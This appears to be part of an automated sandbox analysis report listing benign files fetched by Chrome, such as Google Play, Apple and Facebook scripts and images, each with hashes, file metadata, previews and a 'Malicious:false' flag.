                                                                                                                                                                                                                                  SHA-512:9CF8DD15ABF289BA2570D203A2D0F45CCAFC0A61DC621D61BD8455D120D7763B752A3ECEFDCC8B15C0A75F78F54CF642B68FBFFF01E86B8EC64F466F02FB508C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("Lkzi5d");._.qr(_.jAa,class extends _.rr{constructor(a){super(a.ta)}H(){return"Lkzi5d"}N(){return!0}Xa(){return _.mAc}});_.$q.Lkzi5d=_.dQa;._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (750)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):2169
                                                                                                                                                                                                                                  Entropy (8bit):4.9548772147686115
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:ildRbgqluYoCoLUmledemlxUlIUvfALSAl/lmmqlmWlfBlAlVlWlgwheAYf9hbF5:INx4gd/d4fTvsaMefp5oD
                                                                                                                                                                                                                                  MD5:89F8EE167E82FADB507197C109ED684B
                                                                                                                                                                                                                                  SHA1:F5A728E7805C71BAE1A8786921AB2735AB07C15E
                                                                                                                                                                                                                                  SHA-256:0B70D5380DCC5A0C4BDD30DE4D68C4B0F598EB4EA92BEEC1B6D5F0852BD96D22
                                                                                                                                                                                                                                  SHA-512:BC12D7CB827E364176A691C2ED5C73A481547C572A0C00E5FF6B8BD8E698AC7DA96F2D8DA08485F9363F98A1F21338E61A9E813A31DF0A2EB7E96D43A902E5CE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://apps.apple.com/assets/chunk.961.e281a7b797aa9204873b.js
                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[961],{54961:function(n,e,t){t.r(e),t.d(e,{cleanup:function(){return c},environment:function(){return o},eventQueue:function(){return i},eventRecorder:function(){return r},immediateEventRecorder:function(){return u}}).var i=t(71026),o={_document:function(){if("undefined"!=typeof document)return document.throw"metricskit-delegates-html.environment HTML delegate 'document' object not found"},_window:function(){if("undefined"!=typeof window)return window.throw"metricskit-delegates-html.environment HTML delegate 'window' object not found"},cookie:function(){return o._window().document.cookie},pageUrl:function(){return o._window().location.href},parentPageUrl:function(){var n,e=o._window(),t=e.parent.if(t!==e)try{n=t.location.href}catch(e){n=o._document().referrer}return n},pixelRatio:function(){return o._window().devicePixelRatio},screenHeight:function(){return o._window().screen.height},scre
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 283 x 263, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):4185
                                                                                                                                                                                                                                  Entropy (8bit):7.930678153674384
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:NT31C9FxEGbTBRaRHPa2+F9/21MAJG5tXqq+QEsM8j:14vblcP9S9/21MAJG5tXqqPx
                                                                                                                                                                                                                                  MD5:751D367A30A43C744E348FCFB4CB923B
                                                                                                                                                                                                                                  SHA1:1269F17B9303BB44B88FCF35CFF9737004F60126
                                                                                                                                                                                                                                  SHA-256:9A853EE2B4A016F552DAABBBE4170098422174DABF5967FBAFDEBD604119F91C
                                                                                                                                                                                                                                  SHA-512:98E2A077C9831DAF2806A7121BF8D9A9EF10634E05C50CBD9E6EDE7661B8A5FF2A39687D956531BC92D6D634CBE5679A7C2B427358839F5C365E9B7312D29970
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/yP/r/ZQxGeuP1tWI.png
                                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................PLTELiq.)3*18X_f~...........%/9@G.&0......ccc...nu}............CJQ!,6......?FM7>E!(.LSZ.'2...:AHhow3:A......&-3....../7=bjq............FMT,39'2<.....emt........<DJ..........HOVy~.$.9......T[c...S[b......[cj.........JQX+6A......]elccc...x}....uy|")/fnusz....y..........GNUOV]|..jry...(/5..........ccc...?g..%/......Bc..-<...aip(>]4R.)3>",7.......)3CJQ\dl...#-8...T[c.'2...FMT.................&0emtsz....3:@....X_fy~.QY`?FMOV]......JQX....../:E;CJ...&1;GNULSZ+28+6A.................9@G...hownu}..........!(......y..jqy...~..2<H......4?J...}............u}...................aly.......pw................................................../6=...[frksz...bjq...Y`g|.....?IU......dks'.4_gn...HS_uy|..........7BMOZf...08>...7>E...EP[...&-3...5My*:UU`md.."...ftRNS...&f....r..{....M..)6....P..t.k:.H."....=f..,J...FX...b.. ....^....o..y. ..4.2[....R.r.D.l..s.....IDATx...ip.e...g....+...BB. ..K..A.9....\w...........[.I .. @...-.(
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (6316)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):89262
                                                                                                                                                                                                                                  Entropy (8bit):5.433844673295272
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:EKzHfiewWzy+0OqtgKHQilCryLQa+gRd9NjppfpVDl6LvuAsu1UavNult+TFYTJT:EuH3zm3HZYyMaLRBcBvst+TFYTJT
                                                                                                                                                                                                                                  MD5:E8D3A6185D998234F144081623E5B457
                                                                                                                                                                                                                                  SHA1:27121EFCD7BC165C1EF9948E7FD7D265F09CBC53
                                                                                                                                                                                                                                  SHA-256:CA6A438B9F61C9A965A1586A4D5750E3366861A20B74C2FF01D1B44CCE47B701
                                                                                                                                                                                                                                  SHA-512:5CDAEBEAF6E79743518E54692CA70E4E0AABCFDBF8CF4A565611292072FCDE763F06287D18268B9C58E0BE32CC8D4A2157DD3C8E95D48D589BE9D7BE91683553
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3iO_y4/y8/l/en_GB/81PfJWE3AVG.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("AbstractSidebarDefaultRouterLink.react",["GeoDomID","Link.react","react"],(function(a,b,c,d,e,f,g){"use strict";var h,i=h||d("react");function a(a){var b=a.children,e=a["aria-describedby"],f=a["aria-labelledby"];a=babelHelpers.objectWithoutPropertiesLoose(a,["children","aria-describedby","aria-labelledby"]);f=d("GeoDomID").useApplyGeoDomIDsDirectly({"aria-describedby":(e=e)!=null?e:void 0,"aria-labelledby":(e=f)!=null?e:void 0});e=f.ref;f=babelHelpers.objectWithoutPropertiesLoose(f,["ref"]);return i.jsx(c("Link.react"),babelHelpers["extends"]({linkRef:e},a,f,{children:b}))}a.displayName=a.name+" [from "+f.id+"]";g["default"]=a}),98);.__d("AbstractSidebarRouterLinkContext",["AbstractSidebarDefaultRouterLink.react","react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=a.createContext(c("AbstractSidebarDefaultRouterLink.react"));g["default"]=b}),98);.__d("AbstractSidebarLink.react",["cx","AbstractSidebarRouterLinkContext","GeoDomID","joinClasses","
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1219)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15418
                                                                                                                                                                                                                                  Entropy (8bit):5.683300889843218
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:PS/H567fwwhUwQgYjy9IG7LGtlf4sDogS/v4MQaeX3MMae:PS/HITw+UwQXjy6GPGtlf4JtX4M5eMMT
                                                                                                                                                                                                                                  MD5:68FBCA53C59CF902DB1ECB55A708C11A
                                                                                                                                                                                                                                  SHA1:9A41100144682430B485EF1BB17652CBFA6BD285
                                                                                                                                                                                                                                  SHA-256:6442CE155C812D4337537DC493008167B1801005CF85C824CDECD1777049D766
                                                                                                                                                                                                                                  SHA-512:7886FC30C761A04B8ACD8C65A8F1AEF419E1903B0AC622209E1D0CB55FBF548A285FF24EF11E5635F3B8D8A145CE500AD8226429DB913E0E611288EC3FC1FABA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.asc=function(a){let b="";if(a!=null&&a.H()>0){let c=_.US(new _.TS("{COUNT,plural, =1{1\u00a0\u043e\u0446\u0435\u043d\u043a\u0430}one{{LOCALIZED_COUNT}\u00a0\u043e\u0446\u0435\u043d\u043a\u0430}few{{LOCALIZED_COUNT}\u00a0\u043e\u0446\u0435\u043d\u043a\u0438}many{{LOCALIZED_COUNT}\u00a0\u043e\u0446\u0435\u043d\u043e\u043a}other{{LOCALIZED_COUNT}\u00a0\u043e\u0446\u0435\u043d\u043a\u0438}}"),{COUNT:a.H(),LOCALIZED_COUNT:""+a.N()});b+='<span class="'+_.T("")+'" aria-label="'+_.T(c)+'">'+_.Q(a.N())+."</span>"}return(0,_.P)(b)};._.GFc=function(a,b,c,d,e,f,g){a=""+_.jX(a,d,c,void 0,b,e,void 0,void 0,(0,_.Jo)('alt="'+_.T("\u0421\u043a\u0440\u0438\u043d\u0448\u043e\u0442")+'" itemprop="image"'),g,f);return(0,_.P)(a)};.var LGc=function(a,b){return b&&b.H()?""+Math.round(310*b.H().N()/b.H().H()):""+a};var MGc=function(a,b,c,d){var e="";c&&_.R(b)&&(d=_.R(d)?_.Uo(d):"",a=""+_.rZ({navigation:c,bu:
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):339
                                                                                                                                                                                                                                  Entropy (8bit):5.183096681211168
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:kRZzRxVvni+RoP0EQAuGNG/QVIgAYIhi19bWwQRaNw6JpyxZRNlad0:kRZTFi+R49vI/AIpYyi/XkbRN20
                                                                                                                                                                                                                                  MD5:B4BF7F7D105853195A28EBE1CE40F1C3
                                                                                                                                                                                                                                  SHA1:28773C28F949F68383B9573D592E098C4ED15628
                                                                                                                                                                                                                                  SHA-256:EA3DEFCE7F735024C5C0E71BDDA9B92199141303D1EA9319C4063281E0BBDF8F
                                                                                                                                                                                                                                  SHA-512:D133F256905FFDFFA3A728620B59BC110051E7D7FCC86213CD4B459CC8B35064EFF0856FB0BB87CC8FA777DDA0157C1DCC18426B450BB5A69EE543C2BA9EA41C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("g6aYuf");._.qr(_.YBa,class extends _.rr{constructor(a){super(a.ta)}H(){return"g6aYuf"}N(){return!0}Xa(){return _.XMc}});_.$q.g6aYuf=_.lRa;._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (847)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13822
                                                                                                                                                                                                                                  Entropy (8bit):5.308557467153006
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:YPNfrSf3gy1fQx56zKsvEsSDIiFtTislPchPTwFlOvHChmC82YFK:YPNzSf3g6zKIHqtpRKEuvHTC82Yg
                                                                                                                                                                                                                                  MD5:2A92CDD99A42BFCD7DAB16887539E231
                                                                                                                                                                                                                                  SHA1:310E2855E334F6F49937490D621710021B15066B
                                                                                                                                                                                                                                  SHA-256:F20C946DA61069DF3F4DC8097FB617DB50F266D25D53758D91FCCBD8341C533C
                                                                                                                                                                                                                                  SHA-512:7DBD1CA6AF6E7AA86F408C6E3D5D35AA49AD39908D8AB10AEF4CF8C806AF27889DA43D8AEDDEE030E6351DF1D81442B431C6AF206A4DF6E9BFB043892850EF49
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:/*! For license information please see chunk.15.097368f212a6a942763f.js.LICENSE.txt */.(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[15],{21015:function(e,t,n){"use strict".e.exports={canvasAvailable:n(1892),continuousScrollEventsAvailable:n(93117),cookiesAvailable:n(2022),cssLinearGradientAvailable:n(83353),cssPropertyAvailable:n(15871),cssViewportUnitsAvailable:n(77499),elementAttributeAvailable:n(13462),eventTypeAvailable:n(70683),isDesktop:n(13459),isHandheld:n(30677),isRetina:n(25152),isTablet:n(53489),localStorageAvailable:n(83574),mediaElementsAvailable:n(58093),mediaQueriesAvailable:n(28342),prefersReducedMotion:n(54719),sessionStorageAvailable:n(63160),svgAvailable:n(91676),threeDTransformsAvailable:n(78795),touchAvailable:n(50012),webGLAvailable:n(72810)}},1892:function(e,t,n){"use strict".var r=n(93796),i=n(6379),o=function(){var e=r.getDocument().createElement("canvas").return!("function"!=typeof e.getContext||!e.getContext("2d"))}.e
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65005)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):696227
                                                                                                                                                                                                                                  Entropy (8bit):5.38605387106501
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:MGryUmPKObVMvcDMbtZNNVJKEq5f+dtaL6rHYGd/0GOCl/FQ1:TryUmiObivKMJZNTJKjp+dtaLq/FQ1
                                                                                                                                                                                                                                  MD5:90ED61CCFDBF59C72D9D5422BEA4C15D
                                                                                                                                                                                                                                  SHA1:DEC09B632108E19481F94F9CBD378E7AEB11452F
                                                                                                                                                                                                                                  SHA-256:6604C5A7BFA2E3F142248368D7C69135A8191D03C72D1024807150C32F4E8E55
                                                                                                                                                                                                                                  SHA-512:E99CFB370A8AF78ADA7252C5C28756731BBCDB28B71C7B671473C461BCF76A6147111D585A89631CEE3A0F693D45F7A9D3DC7462790EF8048631D96C457694D3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:/**. * IMPORTANT NOTE:. *. * This file is licensed only for the use of Apple developers in providing MusicKit Web Services,. * and is subject to the Apple Media Services Terms and Conditions and the Apple Developer Program. * License Agreement. You may not copy, modify, re-host, or create derivative works of this file or the. * accompanying Documentation, or any part thereof, including any updates, without Apple's written consent.. *. * ACKNOWLEDGEMENTS:. * https://js-cdn.music.apple.com/musickit/v1/acknowledgements.txt. */..!function(e,n){"object"==typeof exports&&"undefined"!=typeof module?n(exports):"function"==typeof define&&define.amd?define(["exports"],n):n((e="undefined"!=typeof globalThis?globalThis:e||self).MusicKit={})}(this,(function(e){"use strict";var n=void 0!==typeof self?self:this;function formatArtworkURL(e,n,d){return n=n||e.height||100,d=d||e.width||100,window.devicePixelRatio>=1.5&&(d*=2,n*=2),e.url.replace("{h}",""+n).replace("{w}",""+d).replace("{f}","jpeg")}const
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 283 x 263, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4185
                                                                                                                                                                                                                                  Entropy (8bit):7.930678153674384
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:NT31C9FxEGbTBRaRHPa2+F9/21MAJG5tXqq+QEsM8j:14vblcP9S9/21MAJG5tXqqPx
                                                                                                                                                                                                                                  MD5:751D367A30A43C744E348FCFB4CB923B
                                                                                                                                                                                                                                  SHA1:1269F17B9303BB44B88FCF35CFF9737004F60126
                                                                                                                                                                                                                                  SHA-256:9A853EE2B4A016F552DAABBBE4170098422174DABF5967FBAFDEBD604119F91C
                                                                                                                                                                                                                                  SHA-512:98E2A077C9831DAF2806A7121BF8D9A9EF10634E05C50CBD9E6EDE7661B8A5FF2A39687D956531BC92D6D634CBE5679A7C2B427358839F5C365E9B7312D29970
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................PLTELiq.)3*18X_f~...........%/9@G.&0......ccc...nu}............CJQ!,6......?FM7>E!(.LSZ.'2...:AHhow3:A......&-3....../7=bjq............FMT,39'2<.....emt........<DJ..........HOVy~.$.9......T[c...S[b......[cj.........JQX+6A......]elccc...x}....uy|")/fnusz....y..........GNUOV]|..jry...(/5..........ccc...?g..%/......Bc..-<...aip(>]4R.)3>",7.......)3CJQ\dl...#-8...T[c.'2...FMT.................&0emtsz....3:@....X_fy~.QY`?FMOV]......JQX....../:E;CJ...&1;GNULSZ+28+6A.................9@G...hownu}..........!(......y..jqy...~..2<H......4?J...}............u}...................aly.......pw................................................../6=...[frksz...bjq...Y`g|.....?IU......dks'.4_gn...HS_uy|..........7BMOZf...08>...7>E...EP[...&-3...5My*:UU`md.."...ftRNS...&f....r..{....M..)6....P..t.k:.H."....=f..,J...FX...b.. ....^....o..y. ..4.2[....R.r.D.l..s.....IDATx...ip.e...g....+...BB. ..K..A.9....\w...........[.I .. @...-.(
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):244
                                                                                                                                                                                                                                  Entropy (8bit):7.052798134603722
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:c3ZFl0RTz7vgmXhsKroc6rRnPj5P1e32/XGyw7njUvp:c32Tnoz9P432/unjq
                                                                                                                                                                                                                                  MD5:81226FE56259FE6976BC69271844349A
                                                                                                                                                                                                                                  SHA1:2798D1D805F0B48140FABF2A95A925C5CF240AA5
                                                                                                                                                                                                                                  SHA-256:6CD9FDD3B8FDB2DF17D4D09FB17006C8EB39A3DF753D04D541472A4C8E708284
                                                                                                                                                                                                                                  SHA-512:AF656EC82FC287D897A2C227DAF621F593A56FD333BAB0C7E5664A24736683480CB73CBF91515CEA777FD4B9EA309AD6B42EF261D835E8060FC98DA7BD65E3E0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8L..../.....@.$.4P.k.,..V.r.d.+......7.....n..]...fU...ms..../b@_x.W..?)q.Rm.$.6.p.Q-....`..a..._B_.SB..dX.2.....5..97n6....;N...]..{....~.P.N[....j$.!.....$..`W.(q..r.7.G.....lM...........b,....$...aS...3j..A9..<9
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):645
                                                                                                                                                                                                                                  Entropy (8bit):7.631563068517978
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:6v/7ihaL0Z6T2rkLv0cLSbLzKlRv+reS0TZPhnv8NuKS8jrRJI1b3g0hfue9:riS+v05bLzK7CmTRhnUTJjk1b3Jhfj
                                                                                                                                                                                                                                  MD5:EA2722D3B676D5CDD4F7225E65695112
                                                                                                                                                                                                                                  SHA1:97E5E94CFF5B62F60BA76C7DD9F606304AF8B10C
                                                                                                                                                                                                                                  SHA-256:317E5FDAA14E548C0045D5E662709CFE0B692E0384A8396CF22054BF0A1E1C48
                                                                                                                                                                                                                                  SHA-512:BF06CE48B306A0EA13EBC7BE92CB56440DDF1C35C214BA7C164DECFDA6E2E7AAAB31605196D0690BE4FF509404701CA620C504A5EDF0C3E6A12C6FA5A73C78DA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://fonts.gstatic.com/s/i/productlogos/avatar_anonymous/v4/web-32dp/logo_avatar_anonymous_color_1x_web_32dp.png
                                                                                                                                                                                                                                  Preview:.PNG........IHDR... ... .....szz....LIDATx.b .<|...P|.h(.E.0.....|.x.......a.....!.....q{.t.U...(.A.g.....w.3,&.s.~..h2.....Ip=..4!..[.................r.p6.R......R.....19]z.......%.E.q..........6".#...9..Y.n.U.ZU.ZMu:.Q:t%..y`<.+.0T6.=.i.0.e..a.f...b.\..Ax..e...K...$7..BAk@.\f..}bG.K....\Nk@.T.ha.+.w.%x.5.....k..OJr...$Gd....,.0....n.{..b........%].....K.....?....f....w....j4...@%p{?...|>.....hH.h.....r....h..s.J..@X.j..3#h>.`@Xw..l.K.;).c..>....V.b. T....0B.4....%G......a[..P.........G..B"..!*...m9rj%.....E.AD*...0...!..y``....o.z...1J.FF,..sEr3.s.&....b.m.+.........'.m3(D..{..:..So.Ja..*......#..'....IEND.B`.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 720x352, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):46200
                                                                                                                                                                                                                                  Entropy (8bit):7.9955704705259585
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:768:9BueLEuAAOchHt+Zlfl+DfOIC95tpWT06ISQffs0nEEsjvaGFZIfes+rdUX6qcGD:PueJAahHt+ZlAjOXVYlyEEYvzZ5dUXlh
                                                                                                                                                                                                                                  MD5:912E5E91C9202A2D5433564D1D9091C4
                                                                                                                                                                                                                                  SHA1:DFA408003ECD5E844841D6E92E80B040E9139F6F
                                                                                                                                                                                                                                  SHA-256:84CAFC0A14060976134E63A4F407E482D5473BB429187F00DBE56258D304A9A0
                                                                                                                                                                                                                                  SHA-512:792A2CBD0A48765C1A43540BF2097098BA001B5A1DA054ABDA797DDED0BBD57365CB08787099699471738566F55983921E7F73A582EAB83CA7914B469C2C9437
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/CgUPurtUp8SB709wsQcKLMv6JdIh1em0ka_58V69AorznLv42TV39etS2rt28wv9Rz8=w720-h405-rw
                                                                                                                                                                                                                                  Preview:RIFFp...WEBPVP8 d........*..`.>U$.E#.!%)4....cm....P{c...e.q>v.-+..W.w....%.~?.........K...y....._...?....../V_.....{......S.......=....<........g.....{...............~.......................g.......x........c...;....7.z.2.....5.7.7O..........._a.....O........S...........o...?...?z....~...lh..h..F....L.I.......X]:N.....R..81"W1/.4...!.......-..b...c.Yqp.2........!D.,=.b.po.;..."....7..1_.P..+"T.....v#e.'...r..qN..P.....?..f...P..}B]ZX....Gz....&......0.M...*4&LK#~.{.H\.r~....R-..*:.....Qpm8..;..;.]..^......).v...d.S.......`.r`..%..IM#W.....n..........=l%..$&..Tr.!.B3L.&J3..sM.%m.o.e.?f...Yt.b.3Aw;........=...%.%...9.,.d..@.&*.khV.&...9.cO^.,...d.B...k..XGb........97.......p<.^.H..ZB..a....ou...w.......Ma......aD.......R......$A'g../la..7Db...\F.s...-..$..:.B.jQ....}..L.....8^.N`.C ..i..k..N.....S...Y.F..4.u..I_...d3.k..WT....0.......+]:%..AVZ.f.U.[...\|\`....-...%..<.O...U..{}2.a........Xg.....Uu........'.t...^xg.x.B]...~..........:.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):340
                                                                                                                                                                                                                                  Entropy (8bit):5.238929093641439
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:kRZzRxVvnitIoDblAuGNG/QVIBMZKhitiGwQRaNw6JpyxZRNlad0:kRZTFiCwkI/AIMsiN8kbRN20
                                                                                                                                                                                                                                  MD5:56A9F17F41DB5FBB55F93B77AFA5D67D
                                                                                                                                                                                                                                  SHA1:7A6FBED6606E60FC2BCE5EBFFEE4C36E7D48EC01
                                                                                                                                                                                                                                  SHA-256:F0FBD3006865F8A27D576EC26911913FE621B8A4E74B092D982D9371F50BDE12
                                                                                                                                                                                                                                  SHA-512:06AE4AFB3582D0C4258C95017D58D1B64519556FB91D60244A5A021484DFC157AA5851E436807D505E8575C261F21AAA3DC34460B57AEB5E15CD40EB1905DFAD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("grWkAb");._.qr(_.Rza,class extends _.rr{constructor(a){super(a.ta)}H(){return"grWkAb"}N(){return!0}Xa(){return _.Yvc}});_.$q.grWkAb=_.UPa;.._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (5671)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):31589
                                                                                                                                                                                                                                  Entropy (8bit):5.294834621726941
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:/mgUaozX0BYAqIkvN+P5wRgsZ034sCh4Ni:/mBayFS54sCu0
                                                                                                                                                                                                                                  MD5:B27D43AE35D63DDA7645B7E2184B6EA4
                                                                                                                                                                                                                                  SHA1:4F8D7E7858A8F295020D6A5D97BC829043146C0B
                                                                                                                                                                                                                                  SHA-256:A90C6FD2D1EBB37CBEF5CB96AC530805D7D981C5BC3F51A1B30F9C80BEC9C7AA
                                                                                                                                                                                                                                  SHA-512:3A0239E36F67FAAE360473AA6574306C251333EB300D6C5A7F6165756633BD543B30E5471E51830DBABC4F039AE70A3467D08B3E4366662BF714B34E0DDD9E52
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("AbstractContextualDialogKeepInViewportBehavior",["ContextualLayerDimensions","Event","Vector","abstractMethod","throttle"],(function(a,b,c,d,e,f){a=function(){"use strict";function a(a){this._layer=a,this._listeners=[],this._subscription=null,this._minimumTop=null}var c=a.prototype;c.enable=function(){var a=this,b=this._layer.getArrowDimensions();this._arrowOffset=b.offset;b=b.length;this._arrowBuffer=this._arrowOffset+b;this._subscription=this._layer.subscribe(["show","hide","reposition"],function(b,c){if(a._layer.isFixed())return;b=="reposition"?(a._calculateMinimumTop(c),a._adjustForScroll()):b=="show"?(a._attachScroll(),a._adjustForScroll()):a._detachScroll()});this._layer.isShown()&&this._attachScroll()};c.disable=function(){this._layer.isShown()&&this._detachScroll(),this._subscription.unsubscribe(),this._subscription=null};c.__adjustForScroll=function(a,c){return b("abstractMethod")("AbstractContextualDialogArrowBehavior","__adjustForScroll")};c._attachSc
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):164
                                                                                                                                                                                                                                  Entropy (8bit):6.560027690474973
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:u1Zrql17vRGlYo0Dr9TpkNTF3N9aQgn+39IzWIkYutRCv3hCEKX/n:u1Z+l17vRGMhuRT9p3WzWeutkvRCEKvn
                                                                                                                                                                                                                                  MD5:C3D7960132B3DA262B721E88CFB2583F
                                                                                                                                                                                                                                  SHA1:1612089211858694E09F6F715F3A0B4145DBA674
                                                                                                                                                                                                                                  SHA-256:DE88165FA4D58B4AD531B6F8D8FACBC5DC00F73E96B617E503D36FEE29C53CEC
                                                                                                                                                                                                                                  SHA-512:F18E3F59F71CF7521938C90826FDC28BB7F3EF43749C4DBC48F46FD6FA1B293A58461B50E021B7569F4EDD55B5129C4755E61E3D4F1205B7535F5A572A6EBE45
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/ohRyQRA9rNfhp7xLW0MtW1soD8SEX45Oec7MyH3FaxtukWUG_6GKVpvh3JiugzryLi7Bia02HPw=s20-rw
